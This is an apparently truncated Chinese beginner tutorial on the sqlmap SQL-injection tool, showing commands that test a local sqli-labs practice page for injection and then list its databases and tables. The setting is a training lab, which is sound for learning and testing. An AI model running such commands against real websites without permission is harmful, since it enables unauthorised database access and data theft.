sqlmap漏洞扫描使用教程(入门+图文) |
您所在的位置:网站首页 › 查找网页漏洞的网站是什么 › sqlmap漏洞扫描使用教程(入门+图文) |
sqlmap漏洞扫描使用教程(入门+图文)
|
废话不多说,直接给兄弟们上干货 1.扫描网站 是否存在注入例 http://127.0.0.1/sqlilabs/Less-1/?id=1 只有一个参数,网址不用加双引号(如果参数大于1,网址必须加双引号) 1)检测是否存在注入sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/?id=1
sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/?id=1 --dbs
sqlmap.py -u http://127.0.0.1/sqlilabs/Less-1/?id=1 -D security --tables
|
【本文地址】